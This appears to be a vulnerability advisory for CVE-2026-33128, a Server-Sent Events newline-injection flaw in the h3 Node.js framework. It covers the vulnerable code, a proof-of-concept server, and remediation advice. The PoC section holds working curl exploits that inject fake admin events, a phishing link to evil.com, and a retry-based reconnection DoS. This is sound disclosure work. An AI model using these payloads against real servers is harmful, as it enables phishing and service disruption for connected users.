CVE-2026-33128
HIGHSeverity by source
AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N
Lifecycle Timeline
3Blast Radius
ecosystem impact- 2 npm packages depend on h3 (2 direct, 0 indirect)
Ecosystem-wide dependent count for version 2.0.0.
DescriptionGitHub Advisory
Summary
createEventStream in h3 is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in formatEventStreamMessage() and formatEventStreamComment(). An attacker who controls any part of an SSE message field (id, event, data, or comment) can inject arbitrary SSE events to connected clients.
Details
The vulnerability exists in src/utils/internal/event-stream.ts, lines 170-187:
export function formatEventStreamComment(comment: string): string {
return `: ${comment}\n\n`;
}
export function formatEventStreamMessage(message: EventStreamMessage): string {
let result = "";
if (message.id) {
result += `id: ${message.id}\n`;
}
if (message.event) {
result += `event: ${message.event}\n`;
}
if (typeof message.retry === "number" && Number.isInteger(message.retry)) {
result += `retry: ${message.retry}\n`;
}
result += `data: ${message.data}\n\n`;
return result;
}The SSE protocol (defined in the WHATWG HTML spec) uses newline characters (\n) as field delimiters and double newlines (\n\n) as event separators.
None of the fields (id, event, data, comment) are sanitized for newline characters before being interpolated into the SSE wire format. If any field value contains \n, the SSE framing is broken, allowing an attacker to:
- Inject arbitrary SSE fields - break out of one field and add
event:,data:,id:, orretry:directives - Inject entirely new SSE events - using
\n\nto terminate the current event and start a new one - Manipulate reconnection behavior - inject
retry: 1to force aggressive reconnection (DoS) - Override Last-Event-ID - inject
id:to manipulate which events are replayed on reconnection
Injection via the event field
Intended wire format: Actual wire format (with \n injection):
event: message event: message
data: attacker: hey event: admin ← INJECTED
data: ALL_USERS_HACKED ← INJECTED
data: attacker: heyThe browser's EventSource API parses these as two separate events: one message event and one admin event.
Injection via the data field
Intended: Actual (with \n\n injection):
event: message event: message
data: bob: hi data: bob: hi
← event boundary
event: system ← INJECTED event
data: Reset: evil.com ← INJECTED dataBefore exploit: <img width="700" height="61" alt="image" src="https://github.com/user-attachments/assets/d9d28296-0d42-40d7-b79c-d337406cbfc9" />
<img width="713" height="228" alt="image" src="https://github.com/user-attachments/assets/5a52debc-2775-4367-b427-df4100fe2b8e" />
PoC
Vulnerable server (sse-server.ts)
A realistic chat/notification server that broadcasts user input via SSE:
import { H3, createEventStream, getQuery } from "h3";
import { serve } from "h3/node";
const app = new H3();
const clients: any[] = [];
app.get("/events", (event) => {
const stream = createEventStream(event);
clients.push(stream);
stream.onClosed(() => {
clients.splice(clients.indexOf(stream), 1);
stream.close();
});
return stream.send();
});
app.get("/send", async (event) => {
const query = getQuery(event);
const user = query.user as string;
const msg = query.msg as string;
const type = (query.type as string) || "message";
for (const client of clients) {
await client.push({ event: type, data: `${user}: ${msg}` });
}
return { status: "sent" };
});
serve({ fetch: app.fetch });Exploit
# 1. Inject fake "admin" event via event field
curl -s "http://localhost:3000/send?user=attacker&msg=hey&type=message%0aevent:%20admin%0adata:%20SYSTEM:%20Server%20shutting%20down"
# 2. Inject separate phishing event via data field
curl -s "http://localhost:3000/send?user=bob&msg=hi%0a%0aevent:%20system%0adata:%20Password%20reset:%20http://evil.com/steal&type=message"
# 3. Inject retry directive for reconnection DoS
curl -s "http://localhost:3000/send?user=x&msg=test%0aretry:%201&type=message"Raw wire format proving injection
event: message
event: admin
data: ALL_USERS_COMPROMISED
data: attacker: legit
The browser's EventSource fires this as an admin event with data ALL_USERS_COMPROMISED - entirely controlled by the attacker.
Proof:
<img width="856" height="275" alt="image" src="https://github.com/user-attachments/assets/111d3fde-e461-4e44-8112-9f19fff41fec" />
<img width="950" height="156" alt="image" src="https://github.com/user-attachments/assets/ff750f9c-e5d9-4aa4-b48a-20b49747d2ab" />
Impact
An attacker who can influence any field of an SSE message (common in chat applications, notification systems, live dashboards, AI streaming responses, and collaborative tools) can inject arbitrary SSE events that all connected clients will process as legitimate.
Attack scenarios:
- Cross-user content injection - inject fake messages in chat applications
- Phishing - inject fake system notifications with malicious links
- Event spoofing - trigger client-side handlers for privileged event types (e.g.,
admin,system) - Reconnection DoS - inject
retry: 1to force all clients to reconnect every 1ms - Last-Event-ID manipulation - override the event ID to cause event replay or skipping on reconnection
This is a framework-level vulnerability, not a developer misconfiguration - the framework's API accepts arbitrary strings but does not enforce the SSE protocol's invariant that field values must not contain newlines.
AnalysisAI
The h3 JavaScript framework for Node.js contains a Server-Sent Events (SSE) injection vulnerability in its createEventStream function due to missing newline sanitization. Applications using h3's SSE functionality (pkg:npm/h3) are vulnerable to attackers who can control any part of SSE message fields (id, event, data, or comments), allowing injection of arbitrary events to all connected clients. A proof-of-concept exploit exists demonstrating event injection, cross-user content manipulation, and denial-of-service attacks.
Technical ContextAI
This vulnerability affects h3, a minimal HTTP framework for Node.js (pkg:npm/h3), specifically in its Server-Sent Events implementation. The SSE protocol, defined in the WHATWG HTML specification, uses newline characters as field delimiters and double newlines as event separators. The vulnerable code in src/utils/internal/event-stream.ts functions formatEventStreamMessage and formatEventStreamComment fails to sanitize user input for newline characters before interpolating values into the SSE wire format. This is classified as CWE-93 (Improper Neutralization of CRLF Sequences), a type of injection vulnerability where special characters that have protocol-level meaning are not properly escaped. When untrusted data containing newline characters is passed through these functions, it breaks SSE framing boundaries, allowing attackers to inject arbitrary SSE protocol directives that browsers' EventSource API will parse as legitimate events.
RemediationAI
Upgrade to the patched version of h3 that includes commit 7791538e15ca22437307c06b78fa155bb73632a6 available at https://github.com/h3js/h3/commit/7791538e15ca22437307c06b78fa155bb73632a6 which implements proper newline sanitization in SSE message formatting functions. Until patching is possible, implement input validation middleware that strips or escapes newline characters (both line feed and carriage return) from all data passed to SSE message fields including id, event, data, and comment parameters. As a defense-in-depth measure, implement Content Security Policy headers to restrict event handler origins and validate event types on the client side before processing SSE events. Review application code for all uses of createEventStream and ensure no user-controllable input flows directly into SSE message construction. Consult the full vendor security advisory at https://github.com/h3js/h3/security/advisories/GHSA-22cc-p3c6-wpvm for additional guidance.
Same technique Code Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-22cc-p3c6-wpvm